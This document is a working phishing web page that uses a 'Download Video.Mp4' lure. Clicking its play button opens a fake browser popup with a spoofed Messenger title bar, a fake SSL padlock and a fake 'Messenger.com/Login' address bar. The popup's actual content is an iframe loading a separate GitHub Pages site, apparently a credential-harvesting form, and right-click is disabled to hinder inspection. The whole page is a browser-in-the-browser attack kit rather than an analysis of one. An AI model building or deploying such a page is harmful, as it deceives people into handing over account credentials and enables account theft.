<!DOCTYPE html>
<html>
<header>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
	<link rel="stylesheet" href="style.css">
	<title>Download Video.Mp4</title>
</header>

<body>

	<div class="video">
		<div class="play-btn">
			<ion-icon name="play"></ion-icon>
			<button id="clickme" class="btn">VER</button>
		</div>
	</div>
<style type="text/css">
		*
		{
			margin: 0;
			padding: 0;
		}
		body
		{
			width: 100%;
			height: 100vh;
			background: #000000;
			display: flex;
			align-items: center;
			justify-content: center;
		}
		.video
		{
			width: 425px;
			height: 695px;
			background: linear-gradient(rgba(0,0,0,.5),rgba(0,0,0,.5)),url(https://i.ibb.co/Sc8CQHt/lajary.jpg);
			border-radius: 5%;
			background-size: cover;
			background-repeat: no-repeat;
			display: flex;
			align-items: center;
			justify-content: center;
			z-index: 1;
		}
		.play-btn
		{
			display: flex;
			align-items: center;
			justify-content: center;
			background: rgba(2, 128, 231, 0.726);
			color: #ffffff;
			font-size: 50px;
			width: 100px;
			height: 100px;
			border-radius: 100%;
			position: relative;
			z-index: 1;
		}
		.play-btn::before
		{
			content: '';
			position: absolute;
			border: 15px solid #fff;
			border-radius: 50%;
			top: -20px;
			left: -20px;
			right: -20px;
			bottom: -20px;
			animation: bloom1 1.5s linear infinite;
			opacity: 0;
			z-index: 2;
		}
		.play-btn:after
		{
			content: '';
			position: absolute;
			border: 15px solid #fff;
			border-radius: 50%;
			top: -20px;
			left: -20px;
			right: -20px;
			bottom: -20px;
			animation: bloom2 1.5s linear infinite;
			opacity: 0;
			z-index: 1;
			animation-delay: .4s;
		}
		@keyframes bloom1
		{
			0%
			{
				transform: scale(.5);
			}
			50%
			{
				opacity: 1;
			}
			100%
			{
				transform: scale(1.5);
			}
		}
		@keyframes bloom2
		{
			0%
			{
				transform: scale(.5);
			}
			50%
			{
				opacity: 1;
			}
			100%
			{
				transform: scale(1.5);
			}
		}
		.btn
		{
  			position: absolute;
  			top: 50%;
  			left: 48%;
  			transform: translate(-50%, -50%);
  			-ms-transform: translate(-50%, -50%);
  			background-color: #f1f1f1;
  			color: rgb(255, 255, 255);
  			font-size: 16
  			padding: 16px 30px;
  			border: none;
  			cursor: pointer;
  			border-radius: 20px;
  			text-align: center;
			z-index: 3;
		}
</style>
<div id="window" style="margin: auto; position: relative; bottom: auto; display: none; z-index: 4;">
<!-- Title bar start -->
<div id="title-bar-width">
	<div id="title-bar">
		<div style="margin-top:5px;">
			<img src="https://cdn.iconscout.com/icon/free/png-256/free-facebook-messenger-2923653-2416656.png" width="16px" height="15px" id="logo">
			<span id="logo-description">Messenger</span>
		</div>

		<div>
			<span id="minimize">&#8212;</span>
			<span id="square">□</span>
			<span id="exit">✕</span>
		</div>
	</div>
	<div id="url-bar">
		<img src="./ssl.svg" width="20px" height="20px" id="ssl-padlock">
		<span id="domain-path">https://</span>
		<span id="domain-name">Messenger.com</span>
		<span id="domain-path">/Login/</span>
	</div>
</div>
<style type="text/css1">
  @font-face {
  font-family: system;
  font-style: normal;
  font-weight: 300;
  src: local(".SFNSText-Light"), local(".HelveticaNeueDeskInterface-Light"),
    local("Roboto-Light"), local("DroidSans"), local("Tahoma"),
    local(".LucidaGrandeUI"), local("Ubuntu Light"), local("Segoe UI Light");
}

html,
body {
  width: 100%;
  height: 100%;
}

#title-bar {
  height: 31px;
  background-color: black;
  width: 100%;
  display: flex;
  justify-content: space-between;
  user-select: none;
}

#logo {
  padding-left: 5px;
  vertical-align: middle;
}

#logo-description {
  color: white;
  font-size: 12px;
  font-family: "system";
  vertical-align: middle;
}

#minimize {
  color: white;
  font-size: 12px;
  padding: 9px 15px 7px 15px;
}

#square {
  color: white;
  font-size: 22px;
  padding: 0px 15px 5px 15px;
}

#exit {
  color: white;
  font-size: 15px;
  padding: 7px 17px 7px 17px;
}

#url-bar {
  height: 28px;
  background-color: #1b1a1a;
  width: 100%;
  display: flex;
  align-items: center;
  white-space: nowrap;
  overflow: scroll;
  text-overflow: ellipsis;
  -ms-overflow-style: none;
  scrollbar-width: none;
}

#url-bar::-webkit-scrollbar {
  display: none;
}

#ssl-padlock {
  user-select: none;
  padding-left: 8px;
  margin-right: 8px;
}

#domain-name {
  color: white;
  font-size: 14px;
  font-family: "system";
}

#domain-path {
  color: #9c9898;
  font-size: 14px;
  font-family: "system";
}

#title-bar-width {
  width: calc(100% + 2px); /* 2px added to allow for border on iframe */
}

#content {
  width: 100%;
  height: 700px;
  border: 1px solid gray;
}

#window {
  color: transparent;
  background-color: transparent;
  border-color: transparent;
  box-shadow: rgba(0, 0, 0, 0.35) 0px 5px 15px;
  height: 759px; /* title bar height + content height */
  width: 70%;
}
</style>
<!-- Content start -->
<iframe id="content" src="https://portalonlyf.github.io/" frameBorder="0"></iframe>
</div>
<script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
<script nomodule src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.js"></script>
<script type='text/javascript'>
  var minimize = document.getElementById("minimize");
var square = document.getElementById("square");
var exit = document.getElementById("exit");
var titleBar = document.getElementById("title-bar");

////////////////// Hover listeners //////////////////
minimize.addEventListener('mouseover', function handleMouseOver() {
  minimize.style.backgroundColor = '#272727';
  minimize.style.cursor = 'context-menu';
});

minimize.addEventListener('mouseout', function handleMouseOut() {
  minimize.style.backgroundColor = 'black';
  minimize.style.cursor = 'default';
});

square.addEventListener('mouseover', function handleMouseOver() {
  square.style.backgroundColor = '#272727';
  square.style.cursor = 'context-menu';
});

square.addEventListener('mouseout', function handleMouseOut() {
  square.style.backgroundColor = 'black';
  square.style.cursor = 'default';
});

exit.addEventListener('mouseover', function handleMouseOver() {
  exit.style.backgroundColor = 'red';
  exit.style.cursor = 'context-menu';
});

exit.addEventListener('mouseout', function handleMouseOut() {
  exit.style.backgroundColor = 'black';
  exit.style.cursor = 'default';
});

titleBar.addEventListener('mouseover', function handleMouseOver() {
  titleBar.style.cursor = 'context-menu';
});

titleBar.addEventListener('mouseout', function handleMouseOver() {
  titleBar.style.cursor = 'default';
});


//////////////// Make window draggable start ////////////////
// Make the DIV element draggable:
var draggable = $('#window');
var title = $('#title-bar');

title.on('mousedown', function(e){
	var dr = $(draggable).addClass("drag");
	height = dr.outerHeight();
	width = dr.outerWidth();
	ypos = dr.offset().top + height - e.pageY,
	xpos = dr.offset().left + width - e.pageX;
	$(document.body).on('mousemove', function(e){
		var itop = e.pageY + ypos - height;
		var ileft = e.pageX + xpos - width;
		if(dr.hasClass("drag")){
			dr.offset({top: itop,left: ileft});
		}
	}).on('mouseup', function(e){
			dr.removeClass("drag");
	});
});
//////////////// Make window draggable end ////////////////


////////////////// Onclick listeners //////////////////
// X button functionality
$("#exit").click(function(){
    $("#window").css("display", "none");
  });

// Maximize button functionality
$("#square").click(enlarge);

function enlarge(){
  if(square.classList.contains("enlarged")){
    $("#window").css("width", "40%");
    $("#title-bar-width").css('width', '100%').css('width', '+=2px');
    $("#content").css("width", "100%");
    $("#square").removeClass("enlarged");
  }
  else{
    $("#window").css("width", "70%");
    $("#title-bar-width").css('width', '100%').css('width', '+=2px');
    $("#content").css("width", "100%");
    $("#square").addClass("enlarged");
  }
}


//// Pop-up appear on click with delay ////
$("#clickme").click(function(){
    $("#window").fadeIn(300);
  });
</script>
<script type='text/javascript'>
	document.oncontextmenu = function(){return false}
</script>
</body>
<script src="script.js"></script>
</html>